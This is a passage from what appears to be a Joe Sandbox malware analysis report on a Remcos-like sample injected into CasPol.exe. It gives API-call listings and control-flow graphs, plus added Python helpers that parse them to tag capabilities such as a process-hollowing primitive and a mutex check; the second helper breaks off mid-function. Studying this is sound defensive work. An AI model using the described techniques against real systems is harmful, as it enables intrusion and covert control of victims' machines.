                                                                                                              • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040D783), ref: 0041BD88
                                                                                                              • LoadLibraryA.KERNEL32(Shell32), ref: 0041BD99
                                                                                                              • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040D783), ref: 0041BD9C
                                                                                                              • GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040D783), ref: 0041BDA9
                                                                                                              • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040D783), ref: 0041BDAC
                                                                                                              • GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040D783), ref: 0041BDBD
                                                                                                              • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040D783), ref: 0041BDC0
                                                                                                              • GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040D783), ref: 0041BDD1
                                                                                                              • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040D783), ref: 0041BDD4
                                                                                                              • GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040D783), ref: 0041BDE5
                                                                                                              • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040D783), ref: 0041BDE8
                                                                                                              • GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040D783), ref: 0041BDF5
                                                                                                              • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040D783), ref: 0041BDF8
                                                                                                              • LoadLibraryA.KERNEL32(Shlwapi), ref: 0041BE06
                                                                                                              • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040D783), ref: 0041BE09
                                                                                                              • LoadLibraryA.KERNEL32(kernel32), ref: 0041BE16
                                                                                                              • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040D783), ref: 0041BE19
                                                                                                              • GetModuleHandleA.KERNEL32(ntdll,NtSuspendProcess,?,?,?,?,0040D783), ref: 0041BE2B
                                                                                                              • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040D783), ref: 0041BE2E
                                                                                                              • GetModuleHandleA.KERNEL32(ntdll,NtResumeProcess,?,?,?,?,0040D783), ref: 0041BE3B
                                                                                                              • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040D783), ref: 0041BE3E
                                                                                                              • LoadLibraryA.KERNEL32(Iphlpapi), ref: 0041BE50
                                                                                                              • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040D783), ref: 0041BE53
                                                                                                              • LoadLibraryA.KERNEL32(Iphlpapi), ref: 0041BE60
                                                                                                              • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040D783), ref: 0041BE63
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: AddressProc$HandleLibraryLoadModule
                                                                                                              • String ID: EnumDisplayDevicesW$EnumDisplayMonitors$GetComputerNameExW$GetConsoleWindow$GetExtendedTcpTable$GetExtendedUdpTable$GetMonitorInfoW$GetProcessImageFileNameW$GetSystemTimes$GlobalMemoryStatusEx$Iphlpapi$IsUserAnAdmin$IsWow64Process$Kernel32$NtResumeProcess$NtSuspendProcess$NtUnmapViewOfSection$Psapi$SetProcessDEPPolicy$SetProcessDpiAwareness$Shell32$Shlwapi$kernel32$ntdll$shcore$user32
                                                                                                              • API String ID: 384173800-625181639
                                                                                                              • Opcode ID: 0789f4e3f810de028ed60e0db8f6a6efc83e65cfda48e5b03c752fe52fb7e632
                                                                                                              • Instruction ID: 894fbade80705e672e772900be83df88f70523cf1842e1027a1ce5ee2e2841b6
                                                                                                              • Opcode Fuzzy Hash: 0789f4e3f810de028ed60e0db8f6a6efc83e65cfda48e5b03c752fe52fb7e632
                                                                                                              • Instruction Fuzzy Hash: 2831EDA0E4031C7ADA107FB69C49E5B7E9CD944B953110827B508D3162FBBDA9809EEE
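The function above builds its import table at run time: every LoadLibraryA or GetModuleHandleA is immediately followed by a GetProcAddress, and the names it resolves (listed under String ID) include NtUnmapViewOfSection, NtSuspendProcess/NtResumeProcess, IsWow64Process and the Iphlpapi socket-table functions. The Python below is an added triage helper, not part of the Joe Sandbox report and not code from the sample: it pairs each loader call with the GetProcAddress that follows it, then compares the names that are visible in the argument dumps with the function's string pool. SAMPLE_API_LINES and SAMPLE_STRING_ID are constructed from the bullets above, and the labels in CAPABILITY_TAGS are the author's own mapping (an assumption), not something the report states.

```python
"""Rebuild a sample's dynamically resolved import set from Joe Sandbox "APIs" bullets.

Added example for this report; not code from Joe Sandbox and not code from the sample.
SAMPLE_API_LINES and SAMPLE_STRING_ID are constructed from the resolver at 0041BCF8-0041BE63.
CAPABILITY_TAGS is the author's own labelling (an assumption), not something the report states.
"""
import re

# Constructed input: a subset of the report's "APIs" bullets, one pair per module plus the
# GetModuleHandleA pairs whose argument dump happens to show the function name.
SAMPLE_API_LINES = """\
• LoadLibraryA.KERNEL32(Psapi), ref: 0041BCF8
• GetProcAddress.KERNEL32(00000000,?,?,?,?,0040D783), ref: 0041BD01
• GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040D783), ref: 0041BD18
• GetProcAddress.KERNEL32(00000000,?,?,?,?,0040D783), ref: 0041BD1B
• LoadLibraryA.KERNEL32(shcore), ref: 0041BD2D
• GetProcAddress.KERNEL32(00000000,?,?,?,?,0040D783), ref: 0041BD30
• LoadLibraryA.KERNEL32(user32), ref: 0041BD41
• GetProcAddress.KERNEL32(00000000,?,?,?,?,0040D783), ref: 0041BD44
• GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040D783), ref: 0041BD75
• GetProcAddress.KERNEL32(00000000,?,?,?,?,0040D783), ref: 0041BD78
• LoadLibraryA.KERNEL32(Shell32), ref: 0041BD99
• GetProcAddress.KERNEL32(00000000,?,?,?,?,0040D783), ref: 0041BD9C
• LoadLibraryA.KERNEL32(Shlwapi), ref: 0041BE06
• GetProcAddress.KERNEL32(00000000,?,?,?,?,0040D783), ref: 0041BE09
• GetModuleHandleA.KERNEL32(ntdll,NtSuspendProcess,?,?,?,?,0040D783), ref: 0041BE2B
• GetProcAddress.KERNEL32(00000000,?,?,?,?,0040D783), ref: 0041BE2E
• LoadLibraryA.KERNEL32(Iphlpapi), ref: 0041BE50
• GetProcAddress.KERNEL32(00000000,?,?,?,?,0040D783), ref: 0041BE53
""".splitlines()

# The same function's "String ID" value, '$'-joined as the report prints it.
SAMPLE_STRING_ID = (
    "EnumDisplayDevicesW$EnumDisplayMonitors$GetComputerNameExW$GetConsoleWindow$"
    "GetExtendedTcpTable$GetExtendedUdpTable$GetMonitorInfoW$GetProcessImageFileNameW$"
    "GetSystemTimes$GlobalMemoryStatusEx$Iphlpapi$IsUserAnAdmin$IsWow64Process$Kernel32$"
    "NtResumeProcess$NtSuspendProcess$NtUnmapViewOfSection$Psapi$SetProcessDEPPolicy$"
    "SetProcessDpiAwareness$Shell32$Shlwapi$kernel32$ntdll$shcore$user32")

API_LINE = re.compile(
    r"^\s*•?\s*(?P<api>\w+)\.(?P<mod>\w+)(?:\((?P<args>.*?)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$")
LOADERS = {"LoadLibraryA", "LoadLibraryW", "GetModuleHandleA", "GetModuleHandleW"}

# Assumed capability labels keyed by resolved name (author's mapping; adapt to your own taxonomy).
CAPABILITY_TAGS = {name: tag for tag, names in {
    "unmap an image inside another process (hollowing primitive)": ("NtUnmapViewOfSection",),
    "suspend/resume foreign processes": ("NtSuspendProcess", "NtResumeProcess"),
    "enumerate displays": ("EnumDisplayDevicesW", "EnumDisplayMonitors", "GetMonitorInfoW",
                           "SetProcessDpiAwareness"),
    "enumerate TCP/UDP tables": ("GetExtendedTcpTable", "GetExtendedUdpTable"),
    "process and host fingerprinting": ("GetProcessImageFileNameW", "IsWow64Process",
                                        "GetComputerNameExW", "GlobalMemoryStatusEx", "GetSystemTimes"),
    "privilege and mitigation checks": ("IsUserAnAdmin", "SetProcessDEPPolicy"),
    "console window handling": ("GetConsoleWindow",),
}.items() for name in names}


def parse_api_lines(lines):
    """Yield (api, module, args, ref) for every bullet in the 'Api.MODULE(args), ref: X' form."""
    for line in lines:
        m = API_LINE.match(line)
        if m:
            raw = m.group("args") or ""
            args = [a.strip() for a in raw.split(",")] if raw else []
            yield m.group("api"), m.group("mod"), args, m.group("ref")


def _is_symbolic(arg):
    """'?' is an unreadable stack slot and 8 hex digits a raw value; anything else is a string."""
    return arg not in ("", "?") and re.fullmatch(r"[0-9A-Fa-f]{8}", arg) is None


def pair_resolutions(lines):
    """Pair each LoadLibrary*/GetModuleHandle* with the GetProcAddress that follows it.
    'function' stays None when the argument dump does not show the name (every LoadLibraryA pair here)."""
    pairs, pending = [], None
    for api, _mod, args, ref in parse_api_lines(lines):
        if api in LOADERS:
            pending = {"library": args[0] if args and _is_symbolic(args[0]) else None,
                       "function": args[1] if len(args) > 1 and _is_symbolic(args[1]) else None,
                       "load_ref": ref, "resolve_ref": None}
        elif api == "GetProcAddress" and pending is not None:
            pending["resolve_ref"] = ref
            pairs.append(pending)
            pending = None
    return pairs


def names_from_string_pool(string_id, libraries):
    """Split the '$'-joined String ID into names, dropping module names (compared case-insensitively)."""
    libs = {lib.lower() for lib in libraries if lib}
    return [s for s in string_id.split("$") if s and s.lower() not in libs]


def triage(lines, string_id):
    """Summarise the libraries touched, the names the trace shows, and what the string pool implies."""
    pairs = pair_resolutions(lines)
    libraries = {p["library"] for p in pairs if p["library"]}
    visible = {p["function"] for p in pairs if p["function"]}
    pool = names_from_string_pool(string_id, libraries)
    return {"libraries": sorted(libraries, key=str.lower),
            "visible": sorted(visible),
            "name_only_in_string_pool": [n for n in pool if n not in visible],
            "capabilities": sorted({CAPABILITY_TAGS[n] for n in pool if n in CAPABILITY_TAGS}),
            "untagged": sorted(n for n in pool if n not in CAPABILITY_TAGS)}
```

Calling `triage(SAMPLE_API_LINES, SAMPLE_STRING_ID)` surfaces the practical catch in the bullets above: only the GetModuleHandleA pairs expose the target name in the argument dump, while every LoadLibraryA pair shows `00000000,?,?`, so NtUnmapViewOfSection is recoverable only from the String ID pool. A triage rule that keys on GetProcAddress arguments alone would miss the one name that matters most here; the `untagged` list is where names outside your own mapping land, so it should be reviewed rather than ignored.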

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                               control_flow_graph (basic blocks with their successors):
                                                                                                               • 162: 442554-442560 call 447973 -> 165, 166
                                                                                                               • 165: 442582-44258e call 4425d9 ExitProcess
                                                                                                               • 166: 442562-442570 GetPEB -> 165, 167
                                                                                                               • 167: 442572-44257c GetCurrentProcess TerminateProcess -> 165
                                                                                                              APIs
                                                                                                              • GetCurrentProcess.KERNEL32(?,?,0044252A,?), ref: 00442575
                                                                                                              • TerminateProcess.KERNEL32(00000000,?,0044252A,?), ref: 0044257C
                                                                                                              • ExitProcess.KERNEL32 ref: 0044258E
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: Process$CurrentExitTerminate
                                                                                                              • String ID:
                                                                                                              • API String ID: 1703294689-0
                                                                                                              • Opcode ID: 7c471b5b7a391410b3ce269feae26e49b4a02911a71997b74fd7744fcc246e6d
                                                                                                              • Instruction ID: 6e58600c80f72e94ca833af3256d2da28fe7ef7edb4b61bff2e48710a34f1207
                                                                                                              • Opcode Fuzzy Hash: 7c471b5b7a391410b3ce269feae26e49b4a02911a71997b74fd7744fcc246e6d
                                                                                                              • Instruction Fuzzy Hash: 65E08C31004648BFDF016F14EE18A893F29EF10346F408475F80A8A632CFB9DE92CB88
                                                                                                              APIs
                                                                                                              • SetUnhandledExceptionFilter.KERNEL32 ref: 00433CDC
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: ExceptionFilterUnhandled
                                                                                                              • String ID:
                                                                                                              • API String ID: 3192549508-0
                                                                                                              • Opcode ID: 3670727f3e8651977646328ecd403d2a1b3c6ba49dd5bfb528ab2007e995f695
                                                                                                              • Instruction ID: 83953e3dca8a62111c248ad4478ddd9c1373f985a30770e5fc8846644fe13ce9
                                                                                                              • Opcode Fuzzy Hash: 3670727f3e8651977646328ecd403d2a1b3c6ba49dd5bfb528ab2007e995f695
                                                                                                              • Instruction Fuzzy Hash:

                                                                                                              Control-flow Graph

                                                                                                              APIs
                                                                                                              • WaitForSingleObject.KERNEL32(?,000000FF,00475B70,?,?,00000000,00475B70,004017F3), ref: 004047FD
                                                                                                              • SetEvent.KERNEL32(?,?,?,00000000,00475B70,004017F3), ref: 00404808
                                                                                                              • CloseHandle.KERNELBASE(?), ref: 00404811
                                                                                                              • closesocket.WS2_32(?), ref: 0040481F
                                                                                                              • WaitForSingleObject.KERNEL32(?,000000FF,?,?,00000000,00475B70,004017F3), ref: 00404856
                                                                                                              • SetEvent.KERNEL32(?,?,?,00000000,00475B70,004017F3), ref: 00404867
                                                                                                              • WaitForSingleObject.KERNEL32(?,000000FF,?,?,00000000,00475B70,004017F3), ref: 0040486E
                                                                                                              • SetEvent.KERNEL32(?,?,?,00000000,00475B70,004017F3), ref: 00404880
                                                                                                              • CloseHandle.KERNEL32(?), ref: 00404885
                                                                                                              • CloseHandle.KERNEL32(?), ref: 0040488A
                                                                                                              • SetEvent.KERNEL32(?,?,?,00000000,00475B70,004017F3), ref: 00404895
                                                                                                              • CloseHandle.KERNEL32(?), ref: 0040489A
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: CloseEventHandle$ObjectSingleWait$closesocket
                                                                                                              • String ID:
                                                                                                              • API String ID: 3658366068-0
                                                                                                              • Opcode ID: 064d6b1f915996a70041b40538a6eeea030a706771223880b65586d948e925f6
                                                                                                              • Instruction ID: 5504d0c870acfe65fd0076db90b097e51f0e6d2514c589c74abed5ba37c9c78a
                                                                                                              • Opcode Fuzzy Hash: 064d6b1f915996a70041b40538a6eeea030a706771223880b65586d948e925f6
                                                                                                              • Instruction Fuzzy Hash: 3C212C71104B149FCB216B26EC45A27BBE1EF40325F104A7EF2E612AF1CB76E851DB48

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                               control_flow_graph (42 basic blocks in 449950-449b6b; edge list condensed to the blocks that call out):
                                                                                                               • 27: 449991-4499b5 MultiByteToWideChar; 39: 449a25-449a38 MultiByteToWideChar; 83: 449b24-449b34 WideCharToMultiByte
                                                                                                               • 24: 44996b-44997b call 4453f9; 36: 4499dc-4499eb and 60: 449ac1-449ad0 call 455f30 (__alloca_probe_16)
                                                                                                               • 37: 4499f9-449a0a and 61: 449ada-449aeb call 446aff; 44: 449a3e-449a50, 63: 449a7b-449a95 and 67: 449afe-449b17 call 44785d
                                                                                                               • 45: 449b3f-449b46, 66: 449b36-449b3c and 84: 449b64-449b6b call 4353f9 (__freea); 29: 449b48-449b5b call 433d2c
                                                                                                              APIs
                                                                                                              • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,?,0042CE53,?,?,?,00449BA1,00000001,00000001,?), ref: 004499AA
                                                                                                              • __alloca_probe_16.LIBCMT ref: 004499E2
                                                                                                              • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,0042CE53,?,?,?,00449BA1,00000001,00000001,?), ref: 00449A30
                                                                                                              • __alloca_probe_16.LIBCMT ref: 00449AC7
                                                                                                              • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,?,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00449B2A
                                                                                                              • __freea.LIBCMT ref: 00449B37
                                                                                                                • Part of subcall function 00446AFF: RtlAllocateHeap.NTDLL(00000000,00434423,?,?,00437227,?,?,00000000,00475B70,?,0040CC87,00434423,?,?,?,?), ref: 00446B31
                                                                                                              • __freea.LIBCMT ref: 00449B40
                                                                                                              • __freea.LIBCMT ref: 00449B65
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
                                                                                                              • String ID:
                                                                                                              • API String ID: 3864826663-0
                                                                                                              • Opcode ID: aa8dcda0c36fa9ba79fa8fe966d6c0ac5dcd12a00e8d66bfa7c578b9a9788745
                                                                                                              • Instruction ID: d3450b84a68f20df6837e20b70452335b33749c243a385fd48b45426a0ff81fe
                                                                                                              • Opcode Fuzzy Hash: aa8dcda0c36fa9ba79fa8fe966d6c0ac5dcd12a00e8d66bfa7c578b9a9788745
                                                                                                              • Instruction Fuzzy Hash: 89511572610246AFFB258F65DC81EBB77A9EB44754F15462EFC04E6240EF38EC40E668

                                                                                                              Control-flow Graph

                                                                                                              APIs
                                                                                                              • GetLastError.KERNEL32(?,00000000,00000000,0043A7C2,00000000,?,?,0043A846,00000000,00000000,00000000,00000000,00000000,00000000,00402C08,?), ref: 00446F48
                                                                                                              • _free.LIBCMT ref: 00446F7D
                                                                                                              • _free.LIBCMT ref: 00446FA4
                                                                                                              • SetLastError.KERNEL32(00000000), ref: 00446FB1
                                                                                                              • SetLastError.KERNEL32(00000000), ref: 00446FBA
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: ErrorLast$_free
                                                                                                              • String ID:
                                                                                                              • API String ID: 3170660625-0
                                                                                                              • Opcode ID: d9a11e8b10a3382acc57acd06360e0df9f500200efacd02ff515e0ca4c66fe47
                                                                                                              • Instruction ID: 6bd692df8320938abc1815071491dbd9703328d73d2f54107518a18b095bb187
                                                                                                              • Opcode Fuzzy Hash: d9a11e8b10a3382acc57acd06360e0df9f500200efacd02ff515e0ca4c66fe47
                                                                                                              • Instruction Fuzzy Hash: 7401D13620C70067F61266757C85D2F266DDBC3B66727013FF958A2292EE2CCC0A452F

                                                                                                              Control-flow Graph

                                                                                                              control_flow_graph 110 447210-447224 111 447226-44722f 110->111 112 447231-44724c LoadLibraryExW 110->112 113 447288-44728a 111->113 114 447275-44727b 112->114 115 44724e-447257 GetLastError 112->115 118 447284 114->118 119 44727d-44727e FreeLibrary 114->119 116 447266 115->116 117 447259-447264 LoadLibraryExW 115->117 121 447268-44726a 116->121 117->121 120 447286-447287 118->120 119->118 120->113 121->114 122 44726c-447273 121->122 122->120
                                                                                                              APIs
                                                                                                              • LoadLibraryExW.KERNELBASE(00000000,00000000,00000800,?,00000000,00000000,?,004471B7,?,00000000,00000000,00000000,?,004474E3,00000006,FlsSetValue), ref: 00447242
                                                                                                              • GetLastError.KERNEL32(?,004471B7,?,00000000,00000000,00000000,?,004474E3,00000006,FlsSetValue,0045D328,FlsSetValue,00000000,00000364,?,00446F91), ref: 0044724E
                                                                                                              • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,004471B7,?,00000000,00000000,00000000,?,004474E3,00000006,FlsSetValue,0045D328,FlsSetValue,00000000), ref: 0044725C
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: LibraryLoad$ErrorLast
                                                                                                              • String ID:
                                                                                                              • API String ID: 3177248105-0
                                                                                                              • Opcode ID: ae052748fea16bfd64aed14cfe47709c8c773e0353203442da9e9610ebb1fa47
                                                                                                              • Instruction ID: 998cab178f840ac2caaf283a3a5c141d85ba25b8fcaedc139a46ff50caeaa73b
                                                                                                              • Opcode Fuzzy Hash: ae052748fea16bfd64aed14cfe47709c8c773e0353203442da9e9610ebb1fa47
                                                                                                              • Instruction Fuzzy Hash: FC01D83261D7236BD7214B79AC44A577798BB05BA1B1106B2F906E3241D768D802C6D8

                                                                                                              Control-flow Graph

                                                                                                              control_flow_graph 123 44db34-44db68 GetCPInfo 124 44dc5e-44dc6b 123->124 125 44db6e 123->125 126 44dc71-44dc81 124->126 127 44db70-44db7a 125->127 128 44dc83-44dc8b 126->128 129 44dc8d-44dc94 126->129 127->127 130 44db7c-44db8f 127->130 131 44dca0-44dca2 128->131 132 44dca4 129->132 133 44dc96-44dc9d 129->133 134 44dbb0-44dbb2 130->134 137 44dca6-44dcb5 131->137 132->137 133->131 135 44dbb4-44dbeb call 44fed3 call 449b6d 134->135 136 44db91-44db98 134->136 148 44dbf0-44dc1b call 449b6d 135->148 140 44dba7-44dba9 136->140 137->126 139 44dcb7-44dcc7 call 433d2c 137->139 141 44db9a-44db9c 140->141 142 44dbab-44dbae 140->142 141->142 147 44db9e-44dba6 141->147 142->134 147->140 151 44dc1d-44dc27 148->151 152 44dc37-44dc39 151->152 153 44dc29-44dc35 151->153 155 44dc50 152->155 156 44dc3b-44dc40 152->156 154 44dc47-44dc4e 153->154 157 44dc57-44dc5a 154->157 155->157 156->154 157->151 158 44dc5c 157->158 158->139
                                                                                                              APIs
                                                                                                              • GetCPInfo.KERNEL32(?,?,00000005,?,00000000), ref: 0044DB59
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: Info
                                                                                                              • String ID: $fD
                                                                                                              • API String ID: 1807457897-3092946448
                                                                                                              • Opcode ID: 087e75d6d0c5dfc266f8d0db6dc2d9c8bdf64c075b99d56c4e0ad6347b3f9d1b
                                                                                                              • Instruction ID: 070357306f4c5095a08430c9ceac02bf5c2973ae7142a422f036c1757655e3b4
                                                                                                              • Opcode Fuzzy Hash: 087e75d6d0c5dfc266f8d0db6dc2d9c8bdf64c075b99d56c4e0ad6347b3f9d1b
                                                                                                              • Instruction Fuzzy Hash: C241FA7090439C9AEB218F24CCC4BF6BBB9DF45308F1404EEE59A87242D279AE45DF65

                                                                                                              Control-flow Graph

                                                                                                              control_flow_graph 159 40bed7-40bf03 call 401e8f CreateMutexA GetLastError
                                                                                                              APIs
                                                                                                              • CreateMutexA.KERNELBASE(00000000,00000001,00000000,0040D9AA,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E,00000000,0046556C,00000003,00000000), ref: 0040BEE6
                                                                                                              • GetLastError.KERNEL32 ref: 0040BEF1
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: CreateErrorLastMutex
                                                                                                              • String ID: (CG
                                                                                                              • API String ID: 1925916568-4210230975
                                                                                                              • Opcode ID: defc0333e3605ddb085507e8cb5f1de2847b42d11ba618549d06c615cf8541f0
                                                                                                              • Instruction ID: f970ec9d0541ab61c93bafde2a4f59c5c821b48a7874ab2150ad5935bc14b509
                                                                                                              • Opcode Fuzzy Hash: defc0333e3605ddb085507e8cb5f1de2847b42d11ba618549d06c615cf8541f0
                                                                                                              • Instruction Fuzzy Hash: 75D012707083009BD7181774BC8A77D3555E784703F00417AB90FD55E1CB6888409919

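The per-function listings above are raw output of the Joe Sandbox IDA plugin, and this dump of the injected CasPol.exe image (process 34) contains hundreds of them, most of which are C runtime start-up code (the FlsAlloc/FlsSetValue lookups, code-page setup, _free/_abort wrappers) rather than Remcos logic. The script below is an added example, not part of the report: it parses blocks in this format into per-function records (entry address, API ID, String ID, and each API call with module, stack arguments and reference address, with "Part of subcall function" lines kept apart from the function's own calls) and applies three triage rules that are the editor's heuristics, not report fields: a CreateMutex followed by GetLastError is tagged as a single-instance check, a LoadLibraryExW with flags 0x800 (LOAD_LIBRARY_SEARCH_SYSTEM32) followed by a retry with flags 0 is tagged as CRT module-lookup boilerplate, and functions whose only callees are LIBCMT/LIBVCRUNTIME are tagged CRT-internal. The sample input is a constructed excerpt of three blocks copied from this section.

```python
import re
from dataclasses import dataclass, field
from typing import List, Optional

# Constructed sample: three blocks copied from the report excerpt above (process 34, CasPol.exe dump).
SAMPLE = """\
Control-flow Graph
control_flow_graph 110 447210-447224 111 447226-44722f 110->111 112 447231-44724c LoadLibraryExW 110->112
APIs
• LoadLibraryExW.KERNELBASE(00000000,00000000,00000800,?,00000000,00000000,?,004471B7,?,00000000,00000000,00000000,?,004474E3,00000006,FlsSetValue), ref: 00447242
• GetLastError.KERNEL32(?,004471B7,?,00000000,00000000,00000000,?,004474E3,00000006,FlsSetValue,0045D328,FlsSetValue,00000000,00000364,?,00446F91), ref: 0044724E
• LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,004471B7,?,00000000,00000000,00000000,?,004474E3,00000006,FlsSetValue,0045D328,FlsSetValue,00000000), ref: 0044725C
Similarity
• API ID: LibraryLoad$ErrorLast
• String ID:
Control-flow Graph
control_flow_graph 159 40bed7-40bf03 call 401e8f CreateMutexA GetLastError
APIs
• CreateMutexA.KERNELBASE(00000000,00000001,00000000,0040D9AA,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E,00000000,0046556C,00000003,00000000), ref: 0040BEE6
• GetLastError.KERNEL32 ref: 0040BEF1
Strings
Similarity
• API ID: CreateErrorLastMutex
• String ID: (CG
Control-flow Graph
control_flow_graph 256 44dcc8-44dcf2 call 446ebf call 44dde7 call 44da5c
APIs
  • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,?,0043931C), ref: 00446EC3
• _free.LIBCMT ref: 0044DD40
• _free.LIBCMT ref: 0044DD76
"""

# "• Name.MODULE(args), ref: ADDR", optionally prefixed "Part of subcall function ADDR:"; some lines have no args.
API_RE = re.compile(r"^•\s+(?:Part of subcall function (?P<sub>[0-9A-F]{8}):\s*)?(?P<name>\w+)\.(?P<module>\w+)"
                    r"(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]{8})$")
FIELD_RE = re.compile(r"^•\s+(?P<key>API ID|String ID):\s*(?P<val>.*)$")
CFG_RE = re.compile(r"^control_flow_graph\s+\d+\s+(?P<start>[0-9a-f]+)-")
LOAD_LIBRARY_SEARCH_SYSTEM32 = 0x800  # documented LoadLibraryEx flag value

@dataclass
class ApiCall:
    name: str
    module: str
    args: List[str]
    ref: int
    subcall: Optional[str] = None  # set when the line belongs to a callee ("Part of subcall function")

@dataclass
class Function:
    entry: Optional[int] = None  # start of the first basic block from the control_flow_graph line
    api_id: str = ""
    string_id: str = ""
    calls: List[ApiCall] = field(default_factory=list)

def parse_arg(arg: str) -> Optional[int]:
    """IDA shows stack slots as 8 hex digits; '?' and literals such as Exe stay None."""
    return int(arg, 16) if re.fullmatch(r"[0-9A-Fa-f]{8}", arg) else None

def parse_blocks(text: str) -> List[Function]:
    funcs: List[Function] = []
    cur: Optional[Function] = None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "Control-flow Graph":  # every per-function block opens with this heading
            cur = Function()
            funcs.append(cur)
        elif cur is None or not line:
            continue
        elif m := CFG_RE.match(line):
            cur.entry = int(m["start"], 16)
        elif m := API_RE.match(line):
            args = m["args"].split(",") if m["args"] else []
            cur.calls.append(ApiCall(m["name"], m["module"], args, int(m["ref"], 16), m["sub"]))
        elif m := FIELD_RE.match(line):
            setattr(cur, "api_id" if m["key"] == "API ID" else "string_id", m["val"].strip())
    return funcs

def triage(func: Function) -> List[str]:
    """Heuristic tags (the editor's rules, not report fields) over the calls this function makes itself."""
    tags, calls = [], [c for c in func.calls if c.subcall is None]
    for i, c in enumerate(calls):
        later = calls[i + 1:]
        if c.name in ("CreateMutexA", "CreateMutexW") and any(x.name == "GetLastError" for x in later):
            # Single-instance check: create the mutex, then test GetLastError for ERROR_ALREADY_EXISTS.
            # In this dump's listing the lpName slot reads 00000000, so the mutex name is not recovered here.
            tags.append("single-instance mutex check (CreateMutex + GetLastError)")
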